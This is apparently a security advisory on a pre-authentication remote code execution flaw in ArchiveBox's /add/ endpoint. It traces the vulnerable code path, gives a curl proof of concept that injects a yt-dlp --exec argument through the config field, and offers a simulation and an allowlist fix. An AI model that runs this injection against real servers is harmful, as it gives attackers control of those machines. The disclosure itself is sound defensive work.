The /add/ endpoint (AddView in core/views.py) accepts a config JSON field and merges it into the crawl config without validation. That config is exported as environment variables when archive plugins run, so an attacker can inject arbitrary tool arguments and achieve remote code execution (RCE).
When PUBLIC_ADD_VIEW=True (common for bookmarklet usage), this is exploitable without authentication. The endpoint is also @csrf_exempt, so POST requests to it are accepted without a CSRF token.
Affected code:
core/views.py:887 - user config extracted with no validation:
custom_config = form.cleaned_data.get("config") or {}
core/views.py:918 - merged into crawl config:
config.update(custom_config)
config/configset.py:255-256 - crawl config applied with high priority:
if crawl and hasattr(crawl, "config") and crawl.config:
    config.update(crawl.config)
hooks.py:398-411 - config exported as env vars:
for key, value in config.items():
    if key in SKIP_KEYS:
        continue
    env[key] = str(value)
plugins/ytdlp/on_Snapshot__02_ytdlp.bg.py:122-123 - env var args passed to yt-dlp:
ytdlp_args_extra = get_env_array("YTDLP_ARGS_EXTRA", [])
cmd.extend(ytdlp_args_extra)
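The chain above can be sketched end to end as a small simulation. This is a minimal model, not the project's code: the contents of SKIP_KEYS, the body of get_env_array (assumed here to parse a JSON-encoded list), the build_ytdlp_command helper, and the position of the URL in the command are all assumptions made for illustration. Nothing is executed; the sketch only builds the argument list.

```python
import json

# Hypothetical stand-in: the real SKIP_KEYS contents are not shown in the advisory.
SKIP_KEYS = {"PATH"}


def get_env_array(env, name, default):
    """Assumed behaviour: read a JSON-encoded list from an env-style mapping."""
    raw = env.get(name)
    if not raw:
        return default
    try:
        parsed = json.loads(raw)
    except json.JSONDecodeError:
        return default
    if not isinstance(parsed, list):
        return default
    return [str(item) for item in parsed]


def build_ytdlp_command(base_config, custom_config, url):
    """Hypothetical helper that mirrors the merge, export, and extend steps."""
    # The user-supplied dict is merged over the crawl config with no filtering.
    config = dict(base_config)
    config.update(custom_config)

    # Every key not in SKIP_KEYS is stringified into the plugin environment.
    env = {key: str(value) for key, value in config.items() if key not in SKIP_KEYS}

    # The plugin appends the env-provided arguments to its command line.
    cmd = ["yt-dlp"]
    cmd.extend(get_env_array(env, "YTDLP_ARGS_EXTRA", []))
    cmd.append(url)  # assumed position of the URL argument
    return cmd


attacker_config = {"YTDLP_ARGS_EXTRA": json.dumps(["--exec", "id > /tmp/pwned"])}
cmd = build_ytdlp_command({"TIMEOUT": 60}, attacker_config, "https://example.com/video")
print(cmd)
```

Under these assumptions the attacker-controlled strings arrive in the argument list unchanged, which is all that yt-dlp's --exec option needs.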
PoC (pre-auth when PUBLIC_ADD_VIEW=True):
curl -X POST http://localhost:8000/add/ \
  -d "url=https://www.youtube.com/watch?v=dQw4w9WgXcQ" \
  -d "depth=0" \
  -d "config={\"YTDLP_ARGS_EXTRA\": \"[\\\"--exec\\\", \\\"id > /tmp/pwned\\\"]\"}"
After the crawl runs, yt-dlp executes id > /tmp/pwned via its --exec flag.
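The nested escaping in the curl command is easier to follow when the payload is built programmatically. The sketch below only constructs and decodes the form body; it sends nothing. It assumes the server parses the config field as JSON and that the plugin then parses the YTDLP_ARGS_EXTRA string as a second JSON document, which is what the double encoding in the PoC implies.

```python
import json
from urllib.parse import parse_qs, urlencode

# Inner layer: the argument list, JSON-encoded into a single string value.
extra_args = ["--exec", "id > /tmp/pwned"]

# Outer layer: the config form field, itself a JSON object.
config_field = json.dumps({"YTDLP_ARGS_EXTRA": json.dumps(extra_args)})

# Form body equivalent to the three -d parameters of the curl command.
body = urlencode({
    "url": "https://www.youtube.com/watch?v=dQw4w9WgXcQ",
    "depth": "0",
    "config": config_field,
})

# Round trip: decode the form, then both JSON layers, to recover the arguments.
decoded_form = parse_qs(body)
decoded_config = json.loads(decoded_form["config"][0])
recovered_args = json.loads(decoded_config["YTDLP_ARGS_EXTRA"])

print(config_field)
print(recovered_args)
```

The printed config_field is the same string the shell produces after it resolves the backslash escapes in the curl command.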
The same approach works with GALLERYDL_ARGS_EXTRA (gallery-dl --exec), or by overriding any *_BINARY key so that a plugin runs an attacker-chosen executable.
Impact: Remote code execution on the ArchiveBox server. Pre-auth when PUBLIC_ADD_VIEW=True.
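Since the root cause is that the config field is merged without validation, one possible hardening is an allowlist check before the merge. The following is a sketch under stated assumptions, not the project's actual fix: sanitize_custom_config is a hypothetical helper, and the keys in ALLOWED_CONFIG_KEYS are illustrative only.

```python
# Illustrative allowlist; which keys are safe to expose is a project decision.
ALLOWED_CONFIG_KEYS = frozenset({"TIMEOUT", "CHECK_SSL_VALIDITY"})


def sanitize_custom_config(custom_config):
    """Hypothetical helper: accept only allowlisted keys, reject everything else."""
    if not isinstance(custom_config, dict):
        raise ValueError("config must be a JSON object")
    rejected = sorted(key for key in custom_config if key not in ALLOWED_CONFIG_KEYS)
    if rejected:
        raise ValueError("config keys not allowed: " + ", ".join(rejected))
    return dict(custom_config)


# A benign override passes through unchanged.
print(sanitize_custom_config({"TIMEOUT": 30}))

# Keys such as *_ARGS_EXTRA or *_BINARY are refused because they are not listed.
try:
    sanitize_custom_config({"YTDLP_ARGS_EXTRA": '["--exec", "id"]'})
except ValueError as exc:
    print(exc)
```

An allowlist is used here rather than a blocklist of *_ARGS_EXTRA and *_BINARY patterns, so that keys added by future plugins are rejected by default.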